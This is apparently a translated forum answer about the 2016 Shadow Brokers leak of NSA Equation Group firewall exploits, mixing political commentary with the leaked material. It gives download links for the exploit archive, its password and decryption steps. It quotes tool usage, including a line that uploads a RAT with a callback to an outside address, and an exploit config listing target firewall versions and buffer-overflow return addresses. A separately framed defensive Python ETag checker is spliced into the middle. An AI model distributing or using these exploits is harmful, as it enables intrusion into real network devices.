What impact will the leak from the US NSA's Equation Group have?

A hacker claims to have hacked the Equation Group and is auctioning the stolen exploits.

/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group

Archive download (extraction password: theequationgroup)

MEGA DOWNLOAD EquationGroup Files


Two archives were leaked; only the free-file archive can be opened, the other has no password for now (1,000,000 bitcoin):

$ ls -lah *.gpg
-rw-rw-r--@ 1 noname staff 128M 7 25 10:49 eqgrp-auction-file.tar.xz.gpg
-rw-rw-r--@ 1 noname staff 182M 7 25 10:50 eqgrp-free-file.tar.xz.gpg

The free-file contents mainly concern scanners aimed at firewalls, exploitation frameworks and so on:

  • BLATSTING -- brute-force cracking

  • EXPLOITS -- exploitation code

  • OPS -- attack operation control toolkit

  • SCRIPTS -- script resource library

  • TOOLS -- auxiliary toolkit (encoding conversion, IP format conversion, encryption/decryption conversion, etc.)

By analysing the file names of the corresponding attack payloads we can roughly guess which firewall versions are affected; for example, from the information below a Google search shows that Cisco's ASA5505 firewall is affected.

# find /Firewall/BANANAGLEE/BG3000/
.//Install/SCP/asa5505_clean60000.bin
.//Install/SCP/asa5505_clean70000.bin
.//Install/SCP/asa5505_cleanE18BF.bin
.//Install/SCP/asa5505_cleanEC480.bin
.//Install/SCP/asa5505_patch60000.bin
.//Install/SCP/asa5505_patchE18BF.bin
.//Install/SCP/asa5505_patchEC480.bin
.//Install/SCP/asaGen_clean10000_biosVer114or115.bin
.//Install/SCP/asaGen_clean20000_biosVer100or112.bin

Cisco Adaptive Security Appliance SNMP Remote Code Execution Vulnerability

Cisco also realised the problem was quite serious and pushed out a patch.

Juniper NetScreen-ISG 2000 firewall

# ls -lah ./Firewall/BARGLEE/BARGLEE3100/Install/LP
drwxr-xr-x 23 noname staff 782B 8 16 12:35 .
drwxr-xr-x 3 noname staff 102B 4 10 2010 ..
-rwxr-xr-x 1 noname staff 1.8M 6 11 2013 BARPUNCH-3110
-rwxr-xr-x 1 noname staff 2.4M 6 11 2013 BICE-3110
drwxr-xr-x 6 noname staff 204B 4 10 2010 Modules
-rwxr-xr-x 1 noname staff 1.7M 6 11 2013 SecondDateCommon-miniprog-3110
-rwxr-xr-x 1 noname staff 7.8K 6 11 2013 bg_redirect.pl-3110
-rwxr-xr-x 1 noname staff 431K 6 11 2013 bg_redirector-3110
-rwxr-xr-x 1 noname staff 1.9M 6 11 2013 cfMiniProg-3110
-rwxr-xr-x 1 noname staff 1.1M 6 11 2013 isg1000-moduledata-3113.tgz
-rwxr-xr-x 1 noname staff 996K 6 11 2013 isg2000-moduledata-3113.tgz
-rwxr-xr-x 1 noname staff 385K 6 11 2013 keygen-3110
-rwxr-xr-x 1 noname staff 285K 10 18 2013 maclist
-rwxr-xr-x 1 noname staff 1.7M 6 11 2013 nsLogMiniProg-3110
-rwxr-xr-x 1 noname staff 413K 6 11 2013 pd_create_ruleset-3110
-rwxr-xr-x 1 noname staff 1.9M 6 11 2013 pd_miniprog-3110
-rwxr-xr-x 1 noname staff 6.2K 6 11 2013 pd_start_pat.pl-3110
-rwxr-xr-x 1 noname staff 1.8M 6 11 2013 profilerIpv4-3100
-rwxr-xr-x 1 noname staff 29M 6 11 2013 ssg300-moduledata-3115.tgz
-rwxr-xr-x 1 noname staff 29M 6 11 2013 ssg500-moduledata-3115.tgz
-rwxr-xr-x 1 noname staff 13K 6 11 2013 start_redirector.pl-3110
-rwxr-xr-x 1 noname staff 42B 6 11 2013 stop_redirector.sh-3110
-rwxr-xr-x 1 noname staff 1.9M 6 11 2013 tunWiz-3110

In the same directory is the exploit code (pl, sh) for this firewall; note that the options contain the words attack_ip, draw your own conclusions

# perl pd_start_pat.pl-3110
Usage: pd_start_pat.pl --lp & --implant & --idkey &
[--lptimeout &] [--bsize &] --cmd &
--attack_ip & --intermediate_ip &
--attack_int & --target_int & --port_offset &
--trans_timeout & --pat_timeout & --attack_port &
[--logdir &] [--help]

# perl start_redirector.pl-3110 // tunnelling attack tool
Usage: start_redirector.pl --lp & --implant & --idkey &
[--lptimeout &] [--bsize &] --cmd & --local_ip &
--clr_tunnel_ip & --enc_tunnel_ip & --orig_src_ip & --enc_redir_ip & --clr_redir_ip &
--target_ip & --enc_tunnel_pt & --enc_redir_pt &
--enc_iface & --clr_iface &
--enc_key & [--proto &] [--redir_to_target_dest_pt &]
[--redir_to_target_src_pt &] [--target_to_redir_dest_pt &]
[--target_to_redir_src_pt &] [--tunnel_to_attacker_dest_pt &]
[--tunnel_to_attacker_src_pt &] [--restart] --timeout & [--logdir &]
[--help]

Judging from the overall file structure, the whole toolkit was created in 2010

# ls -la
-rw-r--r--@ 1 noname staff 6.0K 8 16 12:35 .DS_Store
drwxr-xr-x 8 noname staff 272B 4 10 2010 BANANAGLEE
drwxr-xr-x 3 noname staff 102B 4 10 2010 BARGLEE
drwxr-xr-x 9 noname staff 306B 4 10 2010 BLATSTING
drwxr-xr-x 4 noname staff 136B 4 10 2010 BUZZDIRECTION
drwxr-xr-x 10 noname staff 340B 4 10 2010 EXPLOITS
drwxr-xr-x 8 noname staff 272B 8 16 12:35 OPS
drwxr-xr-x 35 noname staff 1.2K 8 16 12:35 SCRIPTS
drwxr-xr-x 18 noname staff 612B 8 16 12:36 TOOLS
drwxr-xr-x 4 noname staff 136B 8 16 12:35 TURBO
-rw-r--r-- 1 noname staff 19M 4 10 2010 padding

The attack framework's files are mainly scripts: python, perl and shell scripts

# find ./ -name *.py | wc -l
235
# find ./ -name *.pl | wc -l
7
# find ./ -name *.sh | wc -l
15

The BombShell tool

Firewall/EXPLOITS/ELBO/ $ python eligiblebombshell_1.2.0.1.py
Usage: eligiblebombshell_1.2.0.1.py [options]

See -h for specific options (some of which are required).

Examples:

Scan to find (unknown versions) or confirm (known versions) vulnerability:
eligiblebombshell_1.2.0.1.py -t 1.2.3.4 -e 012-345-6789 --scan -v

Once a valid entry is in ELBO.config, upload nopen:
eligiblebombshell_1.2.0.1.py -t 1.2.3.4 -e 012-345-6789 --nopen -n noserver -c 5.6.7.8:12345 -v

Delete uploaded files from the previous step:
eligiblebombshell_1.2.0.1.py -t 1.2.3.4 -e 012-345-6789 --cleanup -v

eligiblebombshell_1.2.0.1.py: error: -t/--target-ip is required!

The attack configuration file that goes with eligiblebombshell_1.2.0.1

# ELBO.config
#
# format for known versions:
# ETAG = & : & : 0x& : &
# format for unknown versions:
# ETAG = & : & : 0x&
#
# The device returns wacky, invalid ETags sometimes. This file just records
# the "normal" looking parts (without "" and other characters). E.g.:
#
# device ETag | this file
# ---------------------|------------------
# "e8-569-46b6b873" | e8-569-46b6b873
# "3991-583-4727f5a3" | 3991-583-4727f5a3
# W/"55b-583-47958bb3" | 55b-583-47958bb3
# W/"55f-583-47e0a4a8" | 55f-583-47e0a4a8
# W/"600-5e7-494fd7a7" | 600-5e7-494fd7a7
# W/"69a-5e7-49c3697f" | 69a-5e7-49c3697f

# Path to RAT
NOSERVER = /current/up/morerats/staticrats/noserver-3.3.0.1-linux-i386-static

#################################
# ETags from actual hardware
#################################

# tested
ETAG = e6-569-46b6b873 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.2.100.010.1_pbc_17_iv_3
ETAG = 3991-583-4727f5a3 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.3.001.050.1
ETAG = 596-583-47958bb3 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.3.002.021.1
ETAG = 59a-583-47e0a4a8 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.3.002.030.1
ETAG = 641-5e7-494fd7a7 : /cgi/auth.cgi?Url=KeepAuth : libc.1 : v3.3.005.057.1
ETAG = 6e4-5e7-49c3697f : /cgi/auth.cgi?Url=KeepAuth : libc.1 : v3.3.005.061.1

# added Dec. 2009 - WOBBLYLLAMA
ETAG = 55b-583-487b260e : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.030.8_003

# added Mar. 2010 - FLOCKFORWARD
ETAG = 6c6-5e7-4a323af1 : /cgi/auth.cgi?Url=KeepAuth : libc.1 : v3.3.005.066.1

# added Mar. 2010 - HIDDENTEMPLE
ETAG = 1065-569-44aa3cac : /cgi/maincgi.cgi?Url=Index : 0xbfffec70 : tos_3.2.8840.1

# added May. 2010 - CONTAINMENTGRID
ETAG = 83c-5e7-4a323af1 : /cgi/auth.cgi?Url=KeepAuth : libc.1 : tos_3.3.005.066.1

#BLATSTING SUPPORT FOR ALL ABOVE

# added Sep. 2010 - GOTHAMKNIGHT
ETAG = 386f-569-46e895e3 : /cgi/maincgi.cgi?Url=Index : 0xbfffec40 : v3.2.100.010.8_pbc_27

###################################################################
# BELOW IS FOR DEVELOPERS ONLY
###################################################################
# Etags and address from real hardware
#ETAG = e6-569-46b6b873 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb50 : v3.2.100.010.1_pbc_17_iv_3
#ETAG = 3991-583-4727f5a3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb50 : v3.3.001.050.1
#ETAG = 596-583-47958bb3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.021.1
#ETAG = 59a-583-47e0a4a8 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.030.1
#ETAG = 641-5e7-494fd7a7 : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.3.005.057.1
#ETAG = 6e4-5e7-49c3697f : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.3.005.061.1
#ETAG = 69a-5e7-49c3697f : /cgi/maincgi.cgi?Url=Index : 0x7fffeb40 : v3.3.005.061.1
# ETags and addresses from milliways
#ETAG = e8-569-46b6b873 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb60 : v3.2.100.010_1_pbc_17_iv_3
#ETAG = 3991-583-4727f5a3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb60 : v3.3.001.050.1
#ETAG = 55b-583-47958bb3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.021.1
#ETAG = 55f-583-47e0a4a8 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.030.1
#ETAG = 600-5e7-494fd7a7 : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.3.005.057.1
#ETAG = 69a-5e7-49c3697f : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.3.005.061.1
#ETAG = e8-569-46b6b873 : /cgi/maincgi.cgi?Url=Index : 0xbfffec50 : v3.2.100.010_1_pbc_17_iv_3
#ETAG = 3991-583-4727f5a3 : /cgi/maincgi.cgi?Url=Index : 0xbfffeb50 : v3.3.001.050.1
#ETAG = 55b-583-47958bb3 : /cgi/maincgi.cgi?Url=Index : 0xbfffeb60 : v3.3.002.021.1
#ETAG = 55f-583-47e0a4a8 : /cgi/maincgi.cgi?Url=Index : 0xbfffeb60 : v3.3.002.030.1
#ETAG = 600-5e7-494fd7a7 : /cgi/maincgi.cgi?Url=Index : 0x7fffeb50 : v3.3.005.057.1
#ETAG = 69a-5e7-49c3697f : /cgi/maincgi.cgi?Url=Index : 0x7fffeb50 : v3.3.005.061.1
###################################################################

# SCANPLAN format (dates are INCLUSIVE and written as hex values just like the third etag field):
# SCANPLAN = & : & : & : &

# Notes:
# - The full list of addresses must be all on one line.
# - SCANPLAN addresses CANNOT contain a null byte (00) - doing so will break the exploit's
# buffer overflow.
# - The --etag argument will be matched against the min/max dates of these scanplans. If more than
# one plan matches, they will be tried in the order they're listed in this file. If none match,
# the user will get an error to that effect.

# libc attacks - scan plan is simple (try them both)
SCANPLAN = /cgi/auth.cgi?Url=KeepAuth : 0x00000000 : 0x494fd7a6 : libc.0,libc.1
SCANPLAN = /cgi/auth.cgi?Url=KeepAuth : 0x494fd7a7 : 0xffffffff : libc.1,libc.0

# for dates <= versions we've seen with stack at 0xc0000000, try the high addresses and then the low
SCANPLAN = /cgi/auth.cgi?Url=UnrgrAuth : 0x00000000 : 0x487b260e : 0xbfffeb80,0xbfffee80,0xbfffe880,0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,0xbfffd680,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180,0x7fffcf80,0x7fffd280,0x7fffcc80,0x7fffd580,0x7fffc980,0x7fffd880,0x7fffc680,0x7fffdb80,0x7fffc380,0x7fffde80,0x7fffe180,0x7fffe480,0x7fffe780,0x7fffea80,0x7fffed80,0x7ffff080,0x7ffff380,0x7ffff680,0x7ffff980,0x7ffffc80
# for dates >= versions we've seen with stack at 0x8000000, try the low addresses and then the high
SCANPLAN = /cgi/auth.cgi?Url=UnrgrAuth : 0x494fd7a7 : 0xffffffff : 0x7fffcf80,0x7fffd280,0x7fffcc80,0x7fffd580,0x7fffc980,0x7fffd880,0x7fffc680,0x7fffdb80,0x7fffc380,0x7fffde80,0x7fffe180,0x7fffe480,0x7fffe780,0x7fffea80,0x7fffed80,0x7ffff080,0x7ffff380,0x7ffff680,0x7ffff980,0x7ffffc80,0xbfffeb80,0xbfffee80,0xbfffe880,0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,0xbfffd680,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180
# for dates in between the two, try low and high addresses interleaved
SCANPLAN = /cgi/auth.cgi?Url=UnrgrAuth : 0x487b260f : 0x494fd7a6 : 0x7fffcf80,0xbfffeb80,0x7fffd280,0xbfffee80,0x7fffcc80,0xbfffe880,0x7fffd580,0xbffff180,0x7fffc980,0xbfffe580,0x7fffd880,0xbffff480,0x7fffc680,0xbfffe280,0x7fffdb80,0xbffff780,0x7fffc380,0xbfffdf80,0x7fffde80,0xbffffa80,0x7fffe180,0xbfffdc80,0x7fffe480,0xbfffd980,0x7fffe780,0xbfffd680,0x7fffea80,0xbfffd380,0x7fffed80,0xbfffd080,0x7ffff080,0xbfffcd80,0x7ffff380,0xbfffca80,0x7ffff680,0xbfffc780,0x7ffff980,0xbfffc480,0x7ffffc80,0xbfffc180

# for dates <= versions we've seen with stack at 0xc0000000, try the high addresses and then the low
SCANPLAN = /cgi/maincgi.cgi?Url=Index : 0x00000000 : 0x487b260e : 0xbfffeb80,0xbfffee80,0xbfffe880,0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,0xbfffd680,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180,0x7fffeb80,0x7fffee80,0x7fffe880,0x7ffff180,0x7fffe580,0x7ffff480,0x7fffe280,0x7ffff780,0x7fffdf80,0x7ffffa80,0x7fffdc80,0x7fffd980,0x7fffd680,0x7fffd380,0x7fffd080,0x7fffcd80,0x7fffca80,0x7fffc780,0x7fffc480,0x7fffc180
# for dates >= versions we've seen with stack at 0x8000000, try the low addresses and then the high
SCANPLAN = /cgi/maincgi.cgi?Url=Index : 0x494fd7a7 : 0xffffffff : 0x7fffeb80,0x7fffee80,0x7fffe880,0x7ffff180,0x7fffe580,0x7ffff480,0x7fffe280,0x7ffff780,0x7fffdf80,0x7ffffa80,0x7fffdc80,0x7fffd980,0x7fffd680,0x7fffd380,0x7fffd080,0x7fffcd80,0x7fffca80,0x7fffc780,0x7fffc480,0x7fffc180,0xbfffeb80,0xbfffee80,0xbfffe880,0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,0xbfffd680,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180
# for dates in between the two, try low and high addresses interleaved
SCANPLAN = /cgi/maincgi.cgi?Url=Index : 0x487b260f : 0x494fd7a6 : 0xbfffeb80,0x7fffeb80,0xbfffee80,0x7fffee80,0xbfffe880,0x7fffe880,0xbffff180,0x7ffff180,0xbfffe580,0x7fffe580,0xbffff480,0x7ffff480,0xbfffe280,0x7fffe280,0xbffff780,0x7ffff780,0xbfffdf80,0x7fffdf80,0xbffffa80,0x7ffffa80,0xbfffdc80,0x7fffdc80,0xbfffd980,0x7fffd980,0xbfffd680,0x7fffd680,0xbfffd380,0x7fffd380,0xbfffd080,0x7fffd080,0xbfffcd80,0x7fffcd80,0xbfffca80,0x7fffca80,0xbfffc780,0x7fffc780,0xbfffc480,0x7fffc480,0xbfffc180,0x7fffc180


Looking back at this question today, more than half a year later, there is a lot to reflect on. As "senior" practitioners we still underestimated the audacity of the criminal underground and overestimated users' awareness; the aftershocks of the NSA tool leak turned out to be this huge, which probably nobody expected at the time.

A few points to add in hindsight:

1. Nation-state cyber-weapon arsenals really do exist, and they are enormously powerful. An attack tool that has been public for almost a year can still cause impact on this scale; one can imagine how great a threat the huge arsenals still hidden beneath the surface pose to the national security of every country. Moreover, these military-grade weapons may leak and become sharp tools for criminal groups, dealing fatal blows to ordinary businesses and individuals as well.

2. This series of events will push governments to further increase investment in national security and in the information security of critical public infrastructure; the value of the information assets of businesses and individuals keeps rising, so they will inevitably become targets of the criminal industry chain. Fighting cybercrime and protecting personal and corporate information assets will become ever more important, driving rapid growth of the whole information security industry;

3. Information technology is developing at breakneck speed, from the internet to the mobile internet and then to the internet of things and connected vehicles. Not only has the value of information assets grown exponentially, the complexity of security defence has also risen sharply. Some current defensive measures cannot yet fully keep up, and the old industry layout may not be suitable either; this will further stimulate research and development of new technologies and products and bring a new wave of opportunities for the industry;

The original text follows:

The political significance of this event far outweighs its technical significance.

First, look at the distribution chart of the firewall vendors leaked so far

Basically it is just China and the US; doesn't it feel a bit like Pacific Rim?

The firewall brands involved above are:
Huawei (China's largest network equipment vendor) 18.5%
TOPSEC (天融信, China's largest firewall vendor) 6.7%
Cisco (the largest US network equipment vendor) 27.9%
Juniper (the second-largest US network equipment vendor) 14.1%
Fortinet (one of the largest US firewall vendors) 2.1%
WatchGuard (a well-known US firewall vendor)

What does this mean? Let's look at the brand attention share of the Chinese firewall market from the January 2013 survey by the Internet Consumption Research Center:

The products of these brands together account for more than 70%; does it feel like everything is covered?

Now let's look at the timeline:

2007: the US National Security Agency (the protagonist of this article) began the PRISM program, comprehensively monitoring the internet.

June 2013: former CIA employee Edward Snowden disclosed PRISM to the media and pointed out that US-government-backed hackers had attacked many countries around the world.

October 2, 2013: the US company FireEye published "World War C: Understanding Nation-State Motives Behind Today's Advanced Cyber Attacks", which specifically accused China.

2013: the leaders of China and the US met several times and reached consensus on cybersecurity: acknowledge that cyberattack incidents exist, investigate the cyberattacks already discovered, hold bilateral dialogue, and draw acceptable bottom lines.

Most of the attack tools leaked this time were created around the time of the events above. The NSA has reportedly shut down the site for an internal review and is said to suspect an insider, codenamed "Senior Snowden"; it really is a spy thriller.

In the end, China and the US signed a cybersecurity cooperation agreement promising not to attack each other (who believes that), and then FireEye's share price plunged from 80 dollars to 18; I don't know whether that counts as being caught in their own web.

Now look at the auction price in this event: one million bitcoin, i.e. 568 million US dollars or 3.8 billion yuan. No hacker group or commercial company could pay this price; unless it was deliberately set this high, only a nation-state could afford it.

Thanks to Venustech ADLAB (啟明星辰) for providing relevant data and technical support.
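The ELBO.config excerpt quoted earlier in this answer keys version detection to the ETag a TOPSEC appliance returns, and its comments spell out how a raw device ETag is reduced to the stored form (quotes and the W/ prefix dropped). As an added example for this thread, not code from the leak or from this answer, the Python below parses the active ETAG entries of a constructed excerpt in that format, normalises a raw ETag the way the file describes, and reports whether an appliance's ETag is on the known-version list, so an administrator can check an inventory against the leaked target versions. Treating the last ETag field as a hex Unix timestamp is this example's assumption (the file only says the field is a date written in hex); all function names are the example's own.

```python
"""Check a device's HTTP ETag against the ETAG table of an ELBO.config-style
file.  Added example for this thread, not code from the leak or the answer
above; the excerpt below is constructed from ETAG lines quoted in the
answer, and every function name is the example's own."""
import re
from datetime import datetime, timezone

# Constructed excerpt in the documented "ETAG = <etag> : <path> : <third field> : <version>"
# layout.  Commented-out developer entries must be ignored by the parser.
SAMPLE_CONFIG = """\
# tested
ETAG = e6-569-46b6b873 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.2.100.010.1_pbc_17_iv_3
ETAG = 3991-583-4727f5a3 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.3.001.050.1
# added Dec. 2009 - WOBBLYLLAMA
ETAG = 55b-583-487b260e : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.030.8_003
#ETAG = e6-569-46b6b873 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb50 : v3.2.100.010.1_pbc_17_iv_3
"""

ETAG_LINE = re.compile(r"^\s*ETAG\s*=\s*(.+)$")


def normalize_etag(raw):
    """Reduce a device ETag to the bare form the config stores: drop the
    weak-validator prefix W/, the surrounding quotes and any whitespace,
    e.g. W/"55b-583-47958bb3" -> 55b-583-47958bb3."""
    value = raw.strip()
    if value.startswith("W/"):
        value = value[2:]
    return value.strip().strip('"').lower()


def parse_etag_table(text):
    """Map each active (uncommented) ETAG entry to its path and version."""
    table = {}
    for line in text.splitlines():
        match = ETAG_LINE.match(line)
        if not match:  # blank lines and '#' comments fall through here
            continue
        fields = [f.strip() for f in match.group(1).split(":")]
        if len(fields) < 3:
            continue  # tolerate a malformed entry rather than abort
        table[normalize_etag(fields[0])] = {"path": fields[1], "version": fields[-1]}
    return table


def etag_mtime(etag):
    """Interpret the last dash-separated ETag field as a hex Unix mtime, as in
    Apache-style inode-size-mtime ETags (an assumption of this example; the
    config only says the field is a date written in hex)."""
    seconds = int(etag.split("-")[-1], 16)
    return datetime.fromtimestamp(seconds, tz=timezone.utc)


def check_device(raw_etag, table):
    """Report whether the ETag a device returned is on the known-version list."""
    etag = normalize_etag(raw_etag)
    entry = table.get(etag)
    return {
        "etag": etag,
        "listed": entry is not None,
        "version": entry["version"] if entry else None,
        "built": etag_mtime(etag).date().isoformat(),
    }


if __name__ == "__main__":
    known = parse_etag_table(SAMPLE_CONFIG)
    for observed in ('"3991-583-4727f5a3"', 'W/"55b-583-487b260e"', '"dead-beef-4a000000"'):
        print(check_device(observed, known))
```

Feed `check_device` the ETag header your own appliance's management interface returns; a `listed` result means that exact build appears in the leaked table and should be treated as a known target, while an unlisted ETag only means that build was not in this file, not that the device is safe.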


First, the leaked files are absolutely nuclear-weapon grade. The number of files is so large!!! The attack modules so complete!!! The categorisation so clear!!! Personally I think it is unlikely the Equation Group itself was penetrated over the network; it looks more like a wholesale move, e.g. a file server or a disk copy, so a human leak is more likely. Could this be the second half of the Snowden affair?

1. The NSA strictly investigates the leak and tightens discipline. Weapons are scrapped and core modules rewritten to protect key targets

2. Teammates get burned: Five Eyes countries will reassess how much they depend on and trust the NSA

3. National teams' attack capabilities go up N notches, further narrowing the gap with the world's top tier

4. Critical organisations and nodes in every country run a major security inspection, focusing on routers, FWs and other network equipment. The GA/WB/PC agencies will be busy for a while; vendor-side security companies release research reports and checking tools one after another; internet companies check whether their own equipment has been hit

5. Network equipment vendors say they don't know the facts and assure customers they will strengthen device security

6. You guessed it: cybercrime. Professional criminal teams' imaginations run wild; a bloodbath on the internet is coming~~~


GitHub download address: GitHub - hackstoic/eqgrp-free-file: Free sampling of files from the purported Equation Group hack.

---2016-08-24 updated----

e安全's functional analysis of each module

List of the hacking tools used by the US NSA "Equation Group" and an explanation of their functions

---2016-08-22 updated----

Exploits related to TOPSEC products

Analysis of the TOPSEC product vulnerabilities leaked by the NSA Equation Group (Part 1)

---2016-08-21 updated----

Pay particular attention to the code and tools related to SecondDate; the US NSA used this tool in operations in Pakistan and Lebanon

Media report - Snowden: the US cyber-war "arsenal" has been attacked

A security enthusiast has done in-depth analysis and testing of the eqgrp files

In-depth analysis of the NSA (US National Security Agency) leaked files (PART 1)

---2016-08-20 updated----

Today I saw that a security team has analysed the relevant files. Those interested can take a look.

August 19: introduction and technical analysis of the files leaked by the Shadow Brokers (Part 1)

---2016-08-18 created ---

At the moment the link "GitHub · Where software is built" can no longer be opened.

I forked a copy for everyone to download. If you cannot download it, I will upload it to Baidu Netdisk later and post a Baidu Netdisk link.

GitHub download address: GitHub - hackstoic/eqgrp-free-file: Free sampling of files from the purported Equation Group hack.


Some people may not know how to extract it, so here is a download and extraction method:

1. Download: MEGA; for a Baidu Netdisk mirror see: https://pan.baidu.com/s/1nvKZ4ud

2. Unzip EQGRP-Auction-Files.zip

3. Download gpg;

On mac:

brew install gnupg

On Windows:

Download https://files.gpg4win.org/gpg4win-2.3.3.exe and install it

For other systems see:

https://www.gnupg.org/download/

4. Decrypt eqgrp-free-file.tar.xz.gpg: (eqgrp-auction-file.tar.xz.gpg has no password yet)

localhost:~ niming$ gpg /Users/niming/Downloads/EQGRP-Auction-Files/eqgrp-free-file.tar.xz.gpg
gpg: AES256 加密過的數據
gpg: 以 1 個密碼加密

5. Enter the password theequationgroup to obtain eqgrp-free-file.tar.xz

6. On mac, just double-click to extract

7. Newbies, let's all show off and have fun together

The free folder contains the following: (from: Equation Group Firewall Operations Catalogue)

Exploits
EGREGIOUSBLUNDER
A remote code execution exploit for Fortigate firewalls that exploits a HTTP cookie overflow vulnerability.
It affects models 60, 60M, 80C, 200A, 300A, 400A, 500A, 620B, 800, 5000, 1000A, 3600, and 3600A.
The model of the firewall is detected by examining the ETag in the HTTP headers of the firewall. This is not CVE-2006-6493 as detected by Avast.

ELIGIBLEBACHELOR
An exploit for TOPSEC firewalls running the TOS operation system,
affecting versions 3.2.100.010, 3.3.001.050, 3.3.002.021 and 3.3.002.030.
The attack vector is unknown but it has an XML-like payload that starts with &.

ELIGIBLEBOMBSHELL
A remote code execution exploit for TOPSEC firewalls that exploits a HTTP cookie command injection vulnerability,
affecting versions 3.2.100.010.1pbc17iv3 to 3.3.005.066.1. Version detection by ETag examination.

WOBBLYLLAMA
A payload for the ELIGIBLEBOMBSHELL TOPSEC firewall exploit affecting version 3.3.002.030.8_003.

FLOCKFORWARD
A payload for the ELIGIBLEBOMBSHELL TOPSEC firewall exploit affecting version 3.3.005.066.1.

HIDDENTEMPLE
A payload for the ELIGIBLEBOMBSHELL TOPSEC firewall exploit affecting version tos_3.2.8840.1.

CONTAINMENTGRID
A payload for the ELIGIBLEBOMBSHELL TOPSEC firewall exploit affecting version tos_3.3.005.066.1.

GOTHAMKNIGHT
A payload for the ELIGIBLEBOMBSHELL TOPSEC firewall exploit affecting version 3.2.100.010.8pbc27. Has no BLATSTING support.

ELIGIBLECANDIDATE
A remote code execution exploit for TOPSEC firewalls that exploits a HTTP cookie command injection vulnerability,
affecting versions 3.3.005.057.1 to 3.3.010.024.1.

ELIGIBLECONTESTANT
A remote code execution exploit for TOPSEC firewalls that exploits a HTTP POST parameter injection vulnerability,
affecting versions 3.3.005.057.1 to 3.3.010.024.1. This exploit can be tried after ELIGIBLECANDIDATE.

EPICBANANA
A privilege escalation exploit against Cisco Adaptive Security Appliance (ASA) and Cisco Private Internet eXchange (PIX) devices. Exploitation takes advantage of default Cisco credentials (password: cisco).
Affects ASA versions 711, 712, 721, 722, 723, 724, 80432, 804, 805, 822, 823, 824, 825, 831, 832 and PIX versions 711, 712, 721, 722, 723, 724, 804.

ESCALATEPLOWMAN A privilege escalation exploit against WatchGuard firewalls of unknown versions that injects code via the ifconfig command.

EXTRABACON A remote code execution exploit against Cisco Adaptive Security Appliance (ASA) devices
affecting ASA versions 802, 803, 804, 805, 821, 822, 823, 824, 825, 831, 832, 841, 842, 843, 844.
It exploits an overflow vulnerability using the Simple Network Management Protocol (SNMP) and relies on knowing the target's uptime and software version.

BOOKISHMUTE
An exploit against an unknown firewall using Red Hat 6.0.

FALSEMOREL
Allows for the deduction of the "enable" password from data freely offered by an unspecified firewall (likely Cisco) and obtains privileged level access using only the hash of the "enable" password. Requires telnet to be installed on the firewall's inside interface.

Implants
BLATSTING A firewall software implant that is used with EGREGIOUSBLUNDER (Fortigate) and ELIGIBLEBACHELOR (TOPSEC).
BANANAGLEE A non-persistent firewall software implant for Cisco ASA and PIX devices that is installed by writing the implant directly to memory. Also mentioned in the previously leaked NSA ANT catalogue.
BANANABALLOT A BIOS module associated with an implant (likely BANANAGLEE).
BEECHPONY A firewall implant that is a predecessor of BANANAGLEE.
JETPLOW A firmware persistence implant for Cisco ASA and PIX devices that persists BANANAGLEE. Also mentioned in the previously leaked NSA ANT catalogue.
SCREAMINGPLOW Similar to JETPLOW.
BARGLEE A firewall software implant. Unknown vendor.
BUZZDIRECTION A firewall software implant for Fortigate firewalls.
FEEDTROUGH A technique for persisting BANANAGLEE and ZESTYLEAK implants for Juniper Netscreen firewalls. Also mentioned in the previously leaked NSA ANT catalogue.
JIFFYRAUL A module loaded into Cisco PIX firewalls with BANANAGLEE.
BANNANADAIQUIRI An implant associated with SCREAMINGPLOW. Yes, banana is spelled with three Ns this time.
POLARPAWS A firewall implant. Unknown vendor.
POLARSNEEZE A firewall implant. Unknown vendor.
Tools
BILLOCEAN Retrieves the serial number of a firewall, to be recorded in operation notes. Used in conjunction with EGREGIOUSBLUNDER for Fortigate firewalls.
FOSHO A Python library for creating HTTP exploits.
BARICE A tool that provides a shell for installing the BARGLEE implant.
DURABLENAPKIN A tool for injecting packets on LANs.
BANANALIAR A tool for connecting to an unspecified implant (likely BANANAGLEE).
PANDAROCK A tool for connecting to a POLARPAWS implant.
SECONDDATE A packet injection module for Cisco PIX devices.
TEFLONDOOR A self-destructing post-exploitation shell for executing an arbitrary file. The arbitrary file is first encrypted with a key.
